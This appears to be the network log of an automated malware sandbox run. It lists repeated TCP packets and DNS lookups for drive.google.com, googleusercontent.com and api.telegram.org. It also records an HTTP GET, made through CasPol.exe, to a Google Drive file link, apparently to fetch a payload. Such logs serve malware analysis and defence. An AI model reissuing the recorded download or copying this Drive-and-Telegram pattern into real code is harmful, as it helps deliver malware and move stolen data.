                                                                                                                          Jun 14, 2022 13:50:17.345354080 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.345603943 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.345650911 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.345901012 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.347213030 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.347465038 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.347512007 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.347759008 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.348524094 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.348771095 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.348818064 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.349128962 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.349927902 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.350173950 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.350220919 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.350469112 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.351372957 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.351681948 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.351728916 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.352037907 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.352796078 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.353063107 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.353110075 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.353357077 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.354506016 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.354758978 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.354768038 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.354815960 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.355112076 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.355669975 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.355895996 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.355942965 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.356194019 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.357183933 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.357429981 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.357476950 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.357789993 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.358717918 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.358964920 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.359011889 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.359257936 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.360122919 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.360373020 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.360419989 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.360666990 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.361608982 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.361880064 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.361927032 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.362174034 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.363173008 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.363442898 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.363488913 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.363799095 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.364589930 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.364835024 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.364882946 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.365300894 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.365884066 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.366127968 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.366178989 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.366385937 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.367420912 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.367630959 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.367681026 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.367880106 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.368824005 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.369079113 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.369126081 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.369373083 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.370318890 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.370573997 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.370620966 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.370873928 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.371654034 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.371906996 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.371953964 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.372209072 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.373192072 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.373428106 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.373439074 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.373486042 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.373783112 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.374569893 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.374804974 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.374851942 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.375142097 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.375936985 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.376183033 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.376230001 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.376477957 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.377239943 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.377485991 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.377532959 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.377784014 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.378264904 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.378546000 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.378593922 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.378865004 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.379551888 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.379798889 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.379846096 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.380094051 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.380871058 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.381117105 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.381164074 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.381478071 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.382050037 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.382275105 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.382322073 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.382622957 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.383033037 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.383289099 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.383339882 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.383594036 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.383702040 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.383929968 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.383976936 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.384232998 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.384551048 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.384784937 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.384823084 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.385036945 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.385067940 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.385286093 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.385313034 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.385572910 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.385982037 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.386220932 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.386250973 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.386471033 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.386694908 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.386929989 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.386960030 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.387181997 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.387306929 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.387536049 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.387562037 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.387777090 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.387979031 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.388206959 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.388237953 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.388458014 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.388974905 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.389199972 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.389230967 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.389448881 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.389477015 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.389692068 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.389981031 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.390211105 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.390758991 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.390994072 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.391015053 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.391042948 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.391238928 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.391259909 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.391283035 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.391478062 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.391803026 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.392004013 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.392029047 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.392292976 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.392570972 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.392802000 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.392834902 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.393054962 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.393194914 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.393421888 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.393450975 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.393668890 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.393810987 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.394043922 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.394071102 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.394409895 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.394464970 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.394702911 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.394731998 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.394952059 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.395328999 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.395556927 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.395736933 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.395970106 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.396064043 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.396291971 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.396322966 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.396542072 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.396570921 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.396790981 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.396816969 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.397034883 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.397150040 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.397380114 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.397411108 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.397603989 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.397648096 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.397850037 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.397866011 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.398075104 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.398088932 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.398308992 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.398629904 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.398859978 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.398947954 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.399149895 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.399157047 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.399182081 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.399374962 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.399666071 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.399914026 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.399983883 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.400227070 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.400485992 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.400681973 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.400691986 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.400722027 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.400914907 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.401324987 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.401514053 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.401539087 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.401710033 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.401772022 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.402112007 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.402175903 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.402439117 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.402484894 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.402729988 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.402776957 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.403000116 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.403201103 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.403409004 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.403444052 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.403467894 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.403640985 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.403661013 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.404151917 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.404340029 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.404423952 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.404576063 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.404678106 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.404710054 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:17.404903889 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.404932976 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.407038927 CEST49747443192.168.11.20142.251.39.97
                                                                                                                          Jun 14, 2022 13:50:17.407092094 CEST44349747142.251.39.97192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:30.408220053 CEST49757443192.168.11.20149.154.167.220
                                                                                                                          Jun 14, 2022 13:50:30.408233881 CEST44349757149.154.167.220192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:30.408454895 CEST49757443192.168.11.20149.154.167.220
                                                                                                                          Jun 14, 2022 13:50:30.411900997 CEST49757443192.168.11.20149.154.167.220
                                                                                                                          Jun 14, 2022 13:50:30.411906958 CEST44349757149.154.167.220192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:30.509741068 CEST44349757149.154.167.220192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:30.509974957 CEST49757443192.168.11.20149.154.167.220
                                                                                                                          Jun 14, 2022 13:50:30.511724949 CEST49757443192.168.11.20149.154.167.220
                                                                                                                          Jun 14, 2022 13:50:30.511744022 CEST44349757149.154.167.220192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:30.512063980 CEST44349757149.154.167.220192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:30.515753031 CEST49757443192.168.11.20149.154.167.220
                                                                                                                          Jun 14, 2022 13:50:30.558537006 CEST44349757149.154.167.220192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:30.569319963 CEST44349757149.154.167.220192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:30.570250988 CEST49757443192.168.11.20149.154.167.220
                                                                                                                          Jun 14, 2022 13:50:30.570287943 CEST44349757149.154.167.220192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:30.681929111 CEST44349757149.154.167.220192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:30.682032108 CEST44349757149.154.167.220192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:30.682243109 CEST49757443192.168.11.20149.154.167.220
                                                                                                                          Jun 14, 2022 13:50:30.684098005 CEST49757443192.168.11.20149.154.167.220
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Jun 14, 2022 13:50:15.523545027 CEST5941953192.168.11.201.1.1.1
                                                                                                                          Jun 14, 2022 13:50:15.550669909 CEST53594191.1.1.1192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:16.855856895 CEST5386553192.168.11.201.1.1.1
                                                                                                                          Jun 14, 2022 13:50:16.912589073 CEST53538651.1.1.1192.168.11.20
                                                                                                                          Jun 14, 2022 13:50:30.366906881 CEST5841353192.168.11.201.1.1.1
                                                                                                                          Jun 14, 2022 13:50:30.393863916 CEST53584131.1.1.1192.168.11.20
                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                          Jun 14, 2022 13:50:15.523545027 CEST192.168.11.201.1.1.10xb40eStandard query (0)drive.google.comA (IP address)IN (0x0001)
                                                                                                                          Jun 14, 2022 13:50:16.855856895 CEST192.168.11.201.1.1.10x38b4Standard query (0)doc-0s-as-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                                                                                          Jun 14, 2022 13:50:30.366906881 CEST192.168.11.201.1.1.10xa56fStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                          Jun 14, 2022 13:49:32.198771000 CEST1.1.1.1192.168.11.200xa361No error (0)www-bing-com.dual-a-0001.a-msedge.netdual-a-0001.dc-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                          Jun 14, 2022 13:49:32.198771000 CEST1.1.1.1192.168.11.200xa361No error (0)dual-a-0001.dc-msedge.net13.107.22.200A (IP address)IN (0x0001)
                                                                                                                          Jun 14, 2022 13:49:32.198771000 CEST1.1.1.1192.168.11.200xa361No error (0)dual-a-0001.dc-msedge.net131.253.33.200A (IP address)IN (0x0001)
                                                                                                                          Jun 14, 2022 13:49:32.260410070 CEST1.1.1.1192.168.11.200x1c01No error (0)devcenterapi.azure-api.netapimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                          Jun 14, 2022 13:49:32.260410070 CEST1.1.1.1192.168.11.200x1c01No error (0)devcenterapi-eastus-01.regional.azure-api.netapimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.netCNAME (Canonical name)IN (0x0001)
                                                                                                                          Jun 14, 2022 13:50:15.550669909 CEST1.1.1.1192.168.11.200xb40eNo error (0)drive.google.com216.58.212.174A (IP address)IN (0x0001)
                                                                                                                          Jun 14, 2022 13:50:16.912589073 CEST1.1.1.1192.168.11.200x38b4No error (0)doc-0s-as-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                          Jun 14, 2022 13:50:16.912589073 CEST1.1.1.1192.168.11.200x38b4No error (0)googlehosted.l.googleusercontent.com142.251.39.97A (IP address)IN (0x0001)
                                                                                                                          Jun 14, 2022 13:50:30.393863916 CEST1.1.1.1192.168.11.200xa56fNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                                                                          • drive.google.com
                                                                                                                          • doc-0s-as-docs.googleusercontent.com
                                                                                                                          • api.telegram.org
                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          0192.168.11.2049746216.58.212.174443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-06-14 11:50:15 UTC0OUTGET /uc?export=download&id=1JLP2zwq8GeTYGZF2eKMhocl6mu6XFy1T HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Host: drive.google.com
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2022-06-14 11:50:16 UTC0INHTTP/1.1 303 See Other
                                                                                                                          Content-Type: application/binary
                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
